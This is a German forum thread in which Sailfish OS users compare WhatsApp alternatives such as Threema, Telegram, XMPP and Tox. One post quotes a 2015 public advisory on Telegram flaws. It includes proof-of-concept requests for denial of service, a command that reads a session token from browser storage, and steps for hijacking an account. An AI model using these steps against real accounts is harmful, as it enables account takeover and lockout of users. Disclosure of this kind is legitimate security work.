Messenger Qual oder Wahl? WhatsUp-Alternativen?

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Messenger Qual oder Wahl? WhatsUp-Alternativen?

    Hallo Gemeinde,

    habe eben gelesen, dass 'whatsup' wohl nicht mehr weiterentwickelt wird weil der Entwickler Cepi Perez leider Post von den WhatsApp-Anwälten erhalten hat. Siehe hier sein Post: talk.maemo.org/showpost.php?p=1478704&postcount=497
    Blöderweise hat wohl fast jeder meiner Freunde und Bekannten 'WhatsApp' auf seinem Smartphone. Möge man davon halten was man will, aber ich denke euch geht es ähnlich.

    Habt ihr gute Erfahrungen mit anderen Messengern auf eurem Jolla?

    Threema hatte ich kurzfristig mal probiert aber ich bekam keine Benachrichtigungen wenn mir jemand geschrieben hatte...-> unbefriedigend
    Textsecure wäre prinzipiell einen Test wert, aber bei meinen eher wenig technikaffinen Freunden und Bekannten werde ich da wohl ziemlich einsam bleiben.
    Zu Telegram liest man Gutes und Schlechtes -> bin unentschlossen.
    E-Mail finden die meisten zu umständlich -> verstehe ich nicht, ist aber so und die gute alte SMS wird auf Dauer recht teuer wenn man wie ich keine Flat hat.

    Bin euch für Tips/Empfehlungen dankbar.

    Bankman
  • hi Bankman :)

    Folgend nur meine persönliche Meinung:

    tl;dr:
    • WhatsApp-frei seit Jahren!
    • nutze Threema, Conversations (Xabber geht auch) und Email
    • von Telegram rate ich entschieden ab! *


    * kleiner Auszug =
    kuketz-blog.de/telegram-androi…h-ein-sicherer-messenger/
    stern.de/digital/telefon/stift…ram-kritisch-2093131.html
    nexustalk.de/whatsapp-alternat…ssenger-app-ist-unsicher/
    golem.de/news/telegram-der-wer…-contest-1402-104871.html
    fachlich kann ich von Telegram nur abraten und viele (mich eingeschlossen) halten es für eine in "open Source" Papier eingewickelte Mogelpackung. ;)

    Leider kollidieren Schutz der Privatsphäre und Anonymität immer mit Komfort! :(
    Wobei ich dahingehend Threema schon sehr gelungen finde (und es hat bis dato auch keine Implementationsfehler oder Backdoors: os3.nl/_media/2013-2014/course…ojects/threema_report.pdf )
    Einzig die fehlende Benachrichtigung finde ich auch sehr störend beim Jolla, gebe aber die Hoffnung auf eine spätere Lösung nicht auf.

    Bei mir war das so:
    Ich hatte früher auch mal WhatsApp -aber noch nie Facebook- und vor ein paar Jahren mehrten sich dann die Meldungen das FB andere Unternehmen aufkauft und das die NSA Verschlüsselungsverfahren schwächt und gezielt dem NIST unterschiebt.
    Für SonArc und mich stand ein Wechsel zu einer anderen Lösung fest und wir haben recherchiert.
    Schließlich hat uns dann Threema tatsächlich überzeugt, auch wenn es nicht OSS ist, legt man viel Wert auf Transparenz und bisher wurden tatsächlich alle Versprechen der Entwickler gehalten.
    Textsecure war damals leider zu durcheinander, Leute haben das Projekt verlassen und es wurde an Twitter verkauft, was wir nicht so cool und "trusty" fanden. :D
    Ich habe dann einfach meine wichtigen Kontakte angeschrieben und von meinem Wechsel unterrichtet á la:
    "Ab sofort bin ich NUR noch und ausschließlich per Threema <ID>, Email <Adresse>, Jabber <ID> oder per OldSchool SMS erreichbar!"

    Die ersten paar Tage waren wir beide noch recht allein aber nach etwa einer Woche schien ein Umdenken stattzufinden.
    Plötzlich mehrten sich die Kontakte bei Threema und nach etwa 3 Monaten waren tatsächlich alle wichtigen Leute auch da.
    Sicher hat der zwischenzeitliche Kauf WhatsApps durch FB dabei in die Hände gespielt. ;)
    Bis heute nutze ich es als bevorzugten mobilen Messager.
    Neben Jabber, was ich aber hauptsächlich am PC nutze ... eine OTR verschlüsselte Konversation über mehrere Clients ist leider nach wie vor eine Zumutung.

    Ansonsten (verschlüsselte) Email über den privaten Mailserver oder Bitmessage.
    Hatte mir auch mal QuickMessage angeschaut aber das hat leider auch noch nicht überzeugt, hätte aber auf jeden Fall Potenzial.

    Liebe Grüße - med
    IT Security Engineer
    Fachinformatiker / Systemintegrator | GNU / Linux Admin

    Info Bytesund.biz
    Suchst du? Hier findest du!
    Hier deinen Code pasten ...


    Die Sprache der Menschen ist einzigartig aber nicht eindeutig.
    Das Verständnis des Gesagten hängt vom Wohlwollen des Gegenüber ab.
  • Bankman schrieb:


    Blöderweise hat wohl fast jeder meiner Freunde und Bekannten 'WhatsApp' auf seinem Smartphone. Möge man davon halten was man will, aber ich denke euch geht es ähnlich.
    nööh,
    Verstehe ernsthaft nicht, wie man sich so einen Hasenmist=Seuche auf ein Telefon installieren kann? Da kann ich ja gleich ein htc,/samsung/android nutzen?


    Verschickt doch e-Mails ...funktioniert genauso gut. Datenpacken gibt es ab 3 euro, prepaid,
    monatlich kündbar


    ps. habe den Vorteil von WhatsApp nie verstanden
  • Bin zwar auch kein freund von Whatsapp, aber wenn man z.b. schnell Antworten muss muss man den Email client auf IDLE-Push einstellen, bzw. Minuten Takte abfrage machen.... was ja in gründe genommen kein Problem darstellt! Aber dafür sieht man wie schnell der Akku Leistung runter rast. Zusätzlich wird es nervig mit der Nachrichten Historie. Daher, wenn man in einer Gruppe ist, eventuell Familien Gruppe, wird das 1. zu unübersichtlich und 2. Erhält man tausende Emails die man wiederum nerviger weise Löschen muss.

    Würde ja gern wecheln , aber ich finde nichts NATIVES wo man Gruppen Chat nutzen UND Dateien verschicken kann.
  • sailfishmods schrieb:

    Bin zwar auch kein freund von Whatsapp, aber wenn man z.b. schnell Antworten muss muss man den Email client auf IDLE-Push einstellen, bzw. Minuten Takte abfrage machen.... was ja in gründe genommen kein Problem darstellt! Aber dafür sieht man wie schnell der Akku Leistung runter rast. Zusätzlich wird es nervig mit der Nachrichten Historie. Daher, wenn man in einer Gruppe ist, eventuell Familien Gruppe, wird das 1. zu unübersichtlich und 2. Erhält man tausende Emails die man wiederum nerviger weise Löschen muss.

    Würde ja gern wecheln , aber ich finde nichts NATIVES wo man Gruppen Chat nutzen UND Dateien verschicken kann.
    Genau das ist das Problem, vielleicht noch ergänzt um die Trägheit der Masse: Die Masse nutzt WhatsApp weil sie es nicht besser weiß, weil sie sich nicht auskennt, weil alle es haben, weil es praktisch ist etc. etc.
  • Hey,

    spannedes Thema, vielleicht hilft dir die EFF ein wenig weiter? https://www.eff.org/de/node/82654
    Also ich habe mich erst vor wenigen Wochen von Whatsapp getrennt, es ist ohne Frage praktisch, aber durch den Besitzer und die technsichen unzulänglichkeiten einfach nicht haltbar.
    Mein Lieblingsmessenger sind Threema und Jabber (nativ), tatsächliche nutze ich alternativ noch Telegram, weil das einfach sehr viele haben und es im Vergleich zu Whatsapp das kleinere Übel darstellt, vgl. krutor.eu/datenschutz-unterschiede-whatsapp-telegram/
    Tatsächlich sind wenige Kontakte mit zu Threema oder Jabber gewechselt (fast niemand :( , obwohl ich dafür ein Freibier in Aussicht gestellt habe...). Aber zu Telegram liesen sich doch einige bewegen. Ist nur ein kleiner Schritt, aber ich sehe das so, dass alles besser ist als Whatsapp.
    Die neue native Textsecure App funktioniert auf meinem Jolla bisher nicht zufrieden stellend.

    lg
    krutor
  • Zusammenfassend kann man wohl sagen, dass man
    1) WhatsApp meiden sollte,
    2) Telegram auch nicht wirklich toll ist
    3) Textsecure noch nicht gut funktioniert...und es außerdem sehr wenige Leute nutzen

    Bleibt also nur Threema !?
    Hab es mir mal wieder installiert. Leider funktioniert die Benachrichtigung gar nicht und die Bilder meiner Kontakte werden auch nicht angezeigt.
    Vielleicht wird das ja mit dem Update von Sailfish auf 1.1.7 (wenn es denn mal erscheint) oder 2.0 besser?
    Lasst uns hoffen!
  • Die Benachrichtigungen von Threema funktionieren bei mir "manchmal".
    Habe noch kein System gefunden, wann das funktioniert und wann nicht.
    Es kommt vor, dass mir eine Person A eine Nachricht schreibt, von der ich nichts mitbekomme, und dann eine Stunde später eine zweite Person B eine zweite Nachricht, über die ich dann eine Benachrichtigung bekomme.

    Wenn ich dann Threema öffne, sehe ich auch die Nachricht von Person A...

    Sehr seltsam.
    Aber eigentlich finde ich auch, dass Threema momentan die einzige echte Alternative ist.
    Gegen WhatsApp habe ich mich von Anfang an erfolgreich gewehrt - muss halt in Kauf nehmen, dass diverse Leute mich dann eben nicht erreichen.
    Von Threema konnte ich immerhin die komplette Familie meiner Freundin überzeugen plus ein paar verstreute einzelne Freunde.
    Eine native Threema-App wäre natürlich die Krönung, aber ich rechne mal nicht so schnell damit.
  • Mit ein bisschen basteln läuft Threema auf Sailfish relativ gut. Das aber manchmal ohne erkennbaren Grund keine Benachrichtigungen kommen kenne ich leider auch.

    Mein größtes Problem hier in letzter Zeit war noch die zu lange Abfragedauer von 15 Minuten. Aber selbst das könnte sich lösen lassen (bin momentan am testen*) allerdings brauchts dafür ein paar Google Dienste.

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von rhaglion ()

  • sailfishmods schrieb:

    Bin zwar auch kein freund von Whatsapp, aber wenn man z.b. schnell Antworten muss muss man den Email client auf IDLE-Push einstellen, bzw. Minuten Takte abfrage machen.... was ja in gründe genommen kein Problem darstellt! Aber dafür sieht man wie schnell der Akku Leistung runter rast. Zusätzlich wird es nervig mit der Nachrichten Historie. Daher, wenn man in einer Gruppe ist, eventuell Familien Gruppe, wird das 1. zu unübersichtlich und 2. Erhält man tausende Emails die man wiederum nerviger weise Löschen muss.

    Würde ja gern wecheln , aber ich finde nichts NATIVES wo man Gruppen Chat nutzen UND Dateien verschicken kann.


    wenn du die Parameter auf manuelle Abfrage stellst, kannst du mit einer Daumenbewegung sofort sync-en
    Und sry, du nutzt doch WhatsApp sicher nicht auf deinem Geschäft-Handtelefon-Apparillo?
    Privat evtl. egal, aber wenn man so einen Murks noch auf dem Business-Handtelefon nutzt, dann fragt man
    sich schon, irgendwie..?
    -
    Zur Unübersichtlichkeit: ich finde die Ordnerstruktur und das "Saubermachen" mit dem nativen e-Mail-clienten
    eine effektivere Sache, als wenn ich mir da ellenlange sms_s schreibe.
    Dort kannst du gleich mal parallel die ganze Werbung täglich weg klicken und fertig.-
    - synchronisiere immer nur manuell. So viel Zeit muss sein. Ab und zu trudeln dann noch paar mails ein und
    diese ruft man dann ab.

    gerade mit dem nativen SfOS-mail-Klienten kann man übersichtlich kommunizieren. Da ist k9 oder der iOS-Client
    eher zweite Wahl f. d. mobilen Apparat.

    Ich finde den mail-Clienten im SfOS schon das Geld wert. Funktioniert tadellos, wie er soll


    Ich finde es zb. auch unverschämt von whatsApp-Knechten, dass diese noch meine pers. Nummer in ihren Datenbanken
    horten ( ungefragt )
    Hier greift WhatsApp auch die Daten unerlaubt ab und speichert diese, obwohl man selber kein WhatsApp nutzt.
    so was ist frech....und deshalb verstehe ich diese ganzen whatsApp-Heinis nicht. Auf der einen Seite kein facebook,
    kein MS, kein google, keine Dropbox,...dann ein Sf.OS nutzen...aber WhatsApp haben "müssen"(Zwangsneurose u.
    aus Herdentrieb )
  • mal eine Frage zum e-Post-Client ( der Haus-Client von Jolla ist gemeint )


    1?. kann man, wenn man eine mail bekommt, eine html adresse irgendwie kopieren, bzw. öffnen. Habe mir testweise mal einen download-
    Link zu senden lassen - diesen kann man aber nicht öffen,
    da nur Text-Datei + kein Hyperlink möglich, bzw. aktivierbar ( umständlich )


    2 ?. werden im Standard-Jolla-Client die gelöschten mails auch auf dem Server synchron gelöscht oder verbleiben diese in der Regel?
    Kann man da irgend einen Parameter einstellen -
    oder nur vom Thunderbird oder direkt im mai.-account löschbar? ( nur mal so eine generelle Frage )

    Besten Dank
    Gruss
  • Das stellst du, sofern möglich, in deinem Webmail Account ein.
    Per Thunderbird kann man das vielleicht auch einstellen.

    Keine Ahnung, ob du deine Mails per Pop oder IMAP abrufst (ich hoffe IMAP :P ).
    Bei IMAP werden eigentlich Mails automatisch auch auf dem Server gelöscht
    sobald sie am Client entfernt werden und das nicht anderweitig (vor-)eingestellt wurde.

    Mit älteren Outlooks gab es mal komische Sachen, da wurden Mails nur
    durchgestrichen und man musste den Ordner wechseln oder das Programm neu starten
    bevor der die Mails gelöscht hat.

    Da ich Mail selbst hoste kann ich nur mit Sicherheit sagen, wie es eigentlich funktionieren SOLLTE.
    Das sich aber die "Bullshit made in Germany" Anbieter oft nicht an Richtlinien halten weiß ich ebenso.
    Dann habe ich vernommen, dass du ein E-Postbrief Konto hast!?
    Durchaus möglich das es hier tatsächlich Sonderregeln gibt, da hier andere gesetzliche Grundlagen greifen.

    Liebe Grüße - med
    IT Security Engineer
    Fachinformatiker / Systemintegrator | GNU / Linux Admin

    Info Bytesund.biz
    Suchst du? Hier findest du!
    Hier deinen Code pasten ...


    Die Sprache der Menschen ist einzigartig aber nicht eindeutig.
    Das Verständnis des Gesagten hängt vom Wohlwollen des Gegenüber ab.
  • Hallo,

    ich möchte mich hier mal reinhängen :)

    Auf der Suche nach dem Messenger der Wahl (oder doch Qual), komme ich nicht so recht weiter.
    Derzeit verbalere ich mein SMS Kontingent, aber das ist keine Dauerlösung.

    Bei jedem der genannten Messenger gibt es Vor-/Nachteile.
    Sei es in Punkto Datenschutz/Sicherheit, nicht ausreichend verbreitet/Akzeptanz fehlt, oder aber nicht offizielle unterstützt, keine native Lösung, technische Probleme, ...

    Mit WhatsApp/WhatsUp tue ich mich immer noch schwer und versuche dagegen anzugehen.
    Bei XMPP/Jabber klemmt es anscheinend auch irgendwie ...
    Nun bin ich auf Telegram (SF OS = Jollagram) und TOX (SF OS = Cyanide) gestoßen.

    Wer nutzt das, wie sind die Erfahrungen, wie melde ich mich an, wie stabil läuft die App, wie sieht der Funktionsumfang aus, ...

    Könnt ihr mir ein wenig weiterhelfen ?
  • Die nativen Jollagramm und Cýanide sind mir noch zu unausgereift.
    Jabber funktioniert klasse, der 'Hausclient' ist einfach aber funktional integriert. Ansonsten tut die Android App Conversations sehr gut (inkl. OTR).
    Telegram (via F-Droid) läuft einwandfrei, nur die Notifications zicken manchmal (wobei ich damit sehr gut klar komme).
    Threema (via Threema-Webstore), genauso wie Telegram wobei ein User (ich glaub es war Eisen) eine Anleitung für bessere Notfications geschrieben hat.
    Libresignal (Nachfolger Textsecure) will bei mir noch nciht so recht (via F-Droid, inkl. der nötigen Repo.).

    Ansonsten hilft dir die EFF eff.org/de/node/82654

    lg
    krutor
  • Telegram (und den Empfehlungen der EFF) stehe ich etwas kritischer gegenüber. :whistling:
    Gerade bei Telegram gab und gibt es mir zu viele Ungereimtheiten und der Programmcode (des Client!) ist zwar OSS aber gerade die Verschlüsselung taugt nichts.
    Wer also darauf Wert legt sollte sich eher Threema, XMPP oder Tox anschauen.

    kuketz-blog.de/telegram-androi…h-ein-sicherer-messenger/
    stern.de/digital/telefon/stift…ram-kritisch-2093131.html
    nexustalk.de/whatsapp-alternat…ssenger-app-ist-unsicher/
    golem.de/news/telegram-der-wer…-contest-1402-104871.html
    darknet.org.uk/2015/07/telegra…suffers-200gbps-pounding/

    Spoiler anzeigen

    Quellcode

    1. Telegram - Multiple Vulnerabilities!
    2. I just copy all related info from seclists.org here:
    3. Date: Tue, 29 Sep 2015 18:53:52 -0300
    4. From: Eduardo Alves
    5. To: fulldisclosure@seclists.org
    6. Subject: [FD] Telegram - Multiple Vulnerabilities
    7. Message-ID:
    8. CADqpuTLYRkXbp7Dx7Yz5FOpYfDjOtrn472j8V1BPLue9Nvr31A@mail.gmail.com
    9. Content-Type: text/plain; charset=UTF-8
    10. #[+] Title: Telegram - Multiple Vulnerabilities
    11. #[+] Product: Telegram
    12. #[+] Vendor: http://telegram.org/
    13. #[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org
    14. #[-]Author : Eduardo Alves
    15. #[-]E-Mail : edudx1[ at ]gmail[ dot ]com
    16. #[-]Website : tempest.com.br/en/
    17. Info:
    18. As we know, the Telegram access uses by default is possible only with a
    19. token (5 digits).
    20. This token could be obtained by: Eavesdropping/desktop
    21. notifications/SMS/incoming calls…
    22. ###################################################################################
    23. #[1] my.telegram.org Denial Of Service
    24. The my.telegram.org website behaves inadequately, blocking the users
    25. access after 5 consecutive incorrect phone number attempts.
    26. PoC:
    27. POST /auth/send_password HTTP/1.1
    28. Host: my.telegram.org
    29. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    30. X-Requested-With: XMLHttpRequest
    31. Referer: https://my.telegram.org/auth
    32. phone=%2B55818888888
    33. ###################################################################################
    34. #[2] Bypass 5 minutes limit to input token
    35. After the web.telegram.org asks for a new token, we have 5 minutes to send
    36. it.
    37. So, just use Telegram-CLI and you can bypass this
    38. PoC:
    39. Telegram-cli version 1.3.3, Copyright © 2013-2015 Vitaly Valtman
    40. Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type
    41. show_license'. This is free software, and you are welcome to redistribute it under certain conditions; typeshow_license’ for details.
    42. Telegram-cli uses libtgl version 2.0.3
    43. Telegram-cli includes software developed by the OpenSSL Project
    44. for use in the OpenSSL Toolkit. (http://www.openssl.org/)
    45. Telegram-cli uses libpython version 2.7.6
    46. I: config dir=[/home/ubuntu/.telegram-cli]
    47. phone number: +558888888888
    48. code (‘call’ for phone call): ←---- ex: You can put after 24 hours
    49. ###################################################################################
    50. #[3] Telegram Denial Of Service in token request
    51. By submitting incorret code attempts, a normal user can’t ask for a new
    52. code for an indetermined period of time.
    53. PoC:
    54. Telegram-cli version 1.3.3, Copyright © 2013-2015 Vitaly Valtman
    55. Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type
    56. show_license'. This is free software, and you are welcome to redistribute it under certain conditions; typeshow_license’ for details.
    57. Telegram-cli uses libtgl version 2.0.3
    58. Telegram-cli includes software developed by the OpenSSL Project
    59. for use in the OpenSSL Toolkit. (http://www.openssl.org/)
    60. Telegram-cli uses libpython version 2.7.6
    61. I: config dir=[/home/ubuntu/.telegram-cli]
    62. phone number: +558388888888
    63. code (‘call’ for phone call): 123123
    64. *** incorrect code
    65. code (‘call’ for phone call): 123123
    66. *** incorrect code
    67. code (‘call’ for phone call): 123123
    68. *** incorrect code
    69. code (‘call’ for phone call): 123123
    70. *** incorrect code
    71. code (‘call’ for phone call): 123123
    72. *** incorrect code
    73. code (‘call’ for phone call): 123123
    74. *** incorrect code
    75. code (‘call’ for phone call): 123123
    76. *** incorrect code
    77. Error: In web.telegram.org
    78. Method: auth.signIn
    79. Result:
    80. {"_":“rpc_error”,“error_code”:420,“error_message”:“FLOOD_WAIT_86129”}
    81. Stack: Error
    82. at h (https://web.telegram.org/js/app.js:16:26020)
    83. at https://web.telegram.org/js/app.js:16:27238
    84. at l (https://web.telegram.org/js/app.js:8:6393)
    85. at https://web.telegram.org/js/app.js:8:6565
    86. at u.$eval (https://web.telegram.org/js/app.js:8:13762)
    87. at u.$digest (https://web.telegram.org/js/app.js:8:12258)
    88. at https://web.telegram.org/js/app.js:8:13847
    89. at s (https://web.telegram.org/js/app.js:7:744)
    90. at https://web.telegram.org/js/app.js:7:2742
    91. at n (https://web.telegram.org/js/app.js:2:16525)
    92. ###################################################################################
    93. #[4] User identity validation abscence
    94. In various scenarios web applications require session management and access
    95. control mechanisms in order to enforce certain actions to be carried out,
    96. exclusively, by certified/authorized personnel.
    97. In web.telegram.org, this management control is implemented through Local
    98. Storage. However, there is a possibility of an attacker ? who possesses
    99. valid dc1_auth_key from the victim ? to access the application alongside
    100. the true user of the given account.
    101. Ex: Firefox
    102. sqlite3 -header -separator " " webappsstore.sqlite “select * from
    103. webappsstore2;” > out.txt; cat out.txt | grep dc1_aut
    104. gro.margelet.bew.:https:443 dc1_auth_key
    105. ccccccccccccc14c18f5b5eab567b23e30a9ffa803027f8ff7c763bb5bbf9bd9908ac5ff53c718b1c8d7b7f9b040956184ca7748cfdaed5eeec071cdbc18cb06151b83ad8edd8febf2c6832b875627e1467c8dd4c612cda4df63cdf95129c960e6521806e12debc3b96846acf668b74c32f3f1f8ad820a60de836316523549cccccccccccccccccc9ec6ec38fd619752d1ed145427dd7600af2312ab493ebebadf6b1effb6e11764887d5c8a679cc371797f92d284dc54c35fb578c41ca61222d7781485cccccccccccccccccccccccca96a97f8dced0a793c80cbd4ed064bb95ea63e69ed912ccf94c53f7563cb27346ccccccccccccccccccc6fd0492db
    106. ###################################################################################
    107. #[5] Hijacking account and importing contacts
    108. If the victim uses only the passcode as two-step verification, we can reset
    109. her account, and as a result, the attacker creates the possibility for
    110. importing contacts and hijacking the account:
    111. Attacker asks for token using Telegram-Web
    112. Obtains the code
    113. Resets account
    114. Waits for the victim to log-in
    115. Imports contacts (auto)
    116. Kills the victim’s session
    117. Enables Two-Step verification (passcode + email)
    118. Thanks to:
    119. Leandro Oliveira
    120. Joaquim Brasil
    121. Marcelo Pessoa
    122. Toronto Garcez
    123. Tiago Barbosa
    124. From Tempest Security Intelligence
    Alles anzeigen


    Bei mir funktionieren alle drei sehr gut aber, wie schon angesprochen, ist Tox (Cyanide) noch weit vom geplanten Potential entfernt.
    Die Tox Clients gibt es zwar für jede Plattform aber ... sagen wir mal so, da ist noch viel Platz nach oben. airborne

    Threema hat Reverse Engineering des Codes per AGB gestattet und wurde mittlerweile mehrfach untersucht.
    Zuletzt gab es ein unabhängiges Auditing, welches keine Schwachstellen in der Implementation der Verschlüsselung feststellen konnte.
    os3.nl/_media/2013-2014/course…ojects/threema_report.pdf
    heise.de/security/meldung/Thre…e-Schwaechen-2868866.html


    JollaTux schrieb:

    Bei jedem der genannten Messenger gibt es Vor-/Nachteile.
    Sei es in Punkto Datenschutz/Sicherheit, nicht ausreichend verbreitet/Akzeptanz fehlt, oder aber nicht offizielle unterstützt, keine native Lösung, technische Probleme, ...
    Das unterschreibe ich so und kann nur nochmal wiederholen, was ich auf Diaspora schonmal geschrieben habe:

    Privacy and cryptography EVER collide with comfort! :)
    You want the first? Then you leave the comfort zone.
    You want comfort? It weakens the first part about privacy or cryptography.
    I also wish a conjunction between these parts. Yet alone because my parents and other peeps doing hard with technical things.

    Mit anderen Worten: Privatsphäre und verschlüsselte Kommunikation kollidieren immer mit Komfort, leider.
    Ich wünsche mir auch eine brauchbare, leicht zu bedienende Alternative, die auch meine Eltern problemlos adaptieren würden. borg
    Tox ist (mittlerweile!) auf einem guten Weg und selbst wenn das beim jetzigen Anlauf noch nicht klappt, so hoffe ich,
    dass zukünftige Projekte von den Erfahrungen profitieren und bald mal eine brauchbare, plattformübergreifende Lösung kommt.

    Übrigens kommt es bei XMPP auch ein wenig mit darauf an was für einen Server du nutzt.
    Wenn der selbst signierte Zertifikate oder beschissene (unsichere) Cipher nutzt, dann kann das schon sein, dass du immer wieder Probleme bekommst.
    Gerade der implementierte Client im Jolla ist da wohl etwas zickig.

    Liebe Grüße - med
    IT Security Engineer
    Fachinformatiker / Systemintegrator | GNU / Linux Admin

    Info Bytesund.biz
    Suchst du? Hier findest du!
    Hier deinen Code pasten ...


    Die Sprache der Menschen ist einzigartig aber nicht eindeutig.
    Das Verständnis des Gesagten hängt vom Wohlwollen des Gegenüber ab.
  • Hi,

    ich habe meinen bestehenden Jabber Account mal testweise eingerichtet. Nach anfänglichen Problemen (Neustart, ...) habe ich zumindest die Möglichekeit gehabt zwischen SMS und XMPP auszuwählen.
    Leider fordert er mich immer wieder auf den Account zu aktivieren. Vielleicht ein Zertifikat Problem. Habe den Account def. aktiv und kann von meinem Linux Rechner darüber kommunizieren.

    Was mich ein wenig nachdenklicher macht: LEdiglich meine Frau, die aber sonst leider WhatsApp nutzt, hätte einen Jabber Account und ein Freund.
    Nun stelle ich mir die Frage ob sich das lohnt für 1 - 2 Leute dieses Konto zu aktivieren.
    Alle anderen nutzen leider WhatsApp was ich sehr schade finde.
    Nun kann ich trotzen und werde leider die Leute nicht dazu bewegen sich einen Jabber, Threema, ... was auch immer anderen Account zu zulegen, oder ich nutze auch WhatsApp bzw. WhatsUp.
    Alles sehr traurig wie ich finde.

    SMS ist schon toll :)
  • Das nächste Problem was ich nun habe: Im Adressbuch kann ich keine Jabber Adressen hinterlegen. Das ist für mich unterirdisch und ich komme mir langsam wie ein Beta Tester vor.

    • Jabber/XMPP: Adressbuch Problematik, Leistungsunfang eher mager, Account anlegen zickt herum !
    • Threema und Co.: Allgemeine Problematik der IMs, allesamt keine nativen App`s !
    • WhatsApp/WhatsUp: Da muss nicht viel zu gesagt werden !
    • Tox & Co.: Toller Ansatz aber leider noch bei weitem nicht so weit wie erforderlich ! Native App`s wären verfügbar.
    Habe nicht zu allem selber die Erfahrungen gesammelt, aber Berichte dazu finden sich auch genügend.

    Was kann ich nun wirklich gut nutzen ?
    Da wäre ich wieder bei SMS oder eMail, wobei letzteres nicht wirklich eine Alternative zu einem IM meiner Meinung nach ist.

    Wie kann Jolla ein solches Smartphone auf den Markt bringen wo meiner Meinung nach die wichtigsten Funktionen nicht wirklich gegeben sind !
    Mein altes Nokia N9 (was noch im Schrank liegt und dort auch noch bleibt) war in vielerlei Hinsicht weiter und ausgereifter (mögen auch Lizenzprobleme dazu beitragen, mag sein !).
    Wir sprechen hier über die SF OS 2.xx. Wie war das bei der 1er Version ! Das vermag ich mir nicht vorstellen.

    Mittlerweile geht meine zwischenzeitliche Begeisterung in Enttäuschung wieder über. Schade !
  • Whatsup funktioniert eigentlich wirklich super.... okay, man muss natürlich die Geschichte mit Facebook und Datensammlung weg schauen. Aber bei allen anderen Messanger gebe ich dir recht. Mich hat das mit Jabber auch genervt keine Bilder/Dateien zu Empfangen/Versenden.... genau so bei ICQ via Plugin. Soll aber allgemein bei fehlerhafter Programmierung der Message App liegen der von Grund auf neu aufgebaut werden muss.... aber nicht gemacht wird zur Zeit. Daher wird auch Whatsup/Mitakuuluu nicht in den Message App integriert. Die Geschichte ist schon alt... damals gab es so einige Anfragen bezüglich Support für MUC, OTR, Filetranfer, etc.... leider alle bei Seite gelegt mit der Begründung das andere Pläne, die Wichtiger sind, durchgeführt werden müssen, was ja sein mag! Aber nach 2 Jahren sollte man auch die Wünsche der vielleicht kleineren Benutzergruppen Realisieren, genau so wie die meisten einen Offline Navi App haben wollen, hat übrigens einer der Höchsten Wunschvotes auf Together.jolla.com

    PS: Ich finde es schade, dass MeeGo nicht frei zur Verfügung gegeben wurde. Da würden bestimmt sehr Interessante Projekte und Portierungen geben.